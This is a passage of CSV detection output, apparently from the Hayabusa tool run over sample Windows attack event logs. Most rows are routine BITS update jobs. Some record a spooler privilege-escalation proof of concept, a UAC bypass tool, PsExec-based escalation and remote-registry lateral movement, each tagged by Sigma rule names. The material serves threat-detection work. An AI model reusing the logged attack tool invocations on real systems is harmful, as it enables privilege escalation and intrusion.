https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: 
http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 
20:19:25.377 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 
00:54:59.449 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 
+2020-11-23 19:52:42.355 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | 
URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 
18:57:59.420 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,info,,Process Created,"Cmd: pocacct.exe payload.dll | Process: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe | User: 3B\lgreen | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x2dfbe | PID: 6320 | PGUID: 6A3C3EF2-8721-5FBF-0000-001009894600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\System32\spoolsv.exe | Process: 
C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 8716 | PGUID: 6A3C3EF2-8739-5FBF-0000-001075514700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 19:45:24.216 +09:00,02694w-win10.threebeesco.com,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,rules/sigma/image_load/sysmon_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: byeintegrity5-uac.exe | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x6ca44 | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious 
Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.147 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\Public\tools\privesc\uac\system32\npmproxy.dll | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.147 +09:00,LAPTOP-JU4M3I0E,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: taskhostw.exe $(Arg0) | Process: C:\Windows\System32\taskhostw.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x6c9e0 | PID: 17336 | PGUID: 00247C92-E803-5FBF-0000-0010CDB9B40C,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: taskhostw.exe $(Arg0) | LID: 0x6c9e0 | PID: 16980 | PGUID: 00247C92-E803-5FBF-0000-0010F2BFB40C",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: 
Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 8536 | PGUID: 747F3D96-BB00-5FCA-0000-001033CD7600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:05.471 
+09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49792 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-33FC-5FCB-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe | Process: C:\Users\Public\psexecprivesc.exe | User: MSEDGEWIN10\user02 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x7485cb | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM 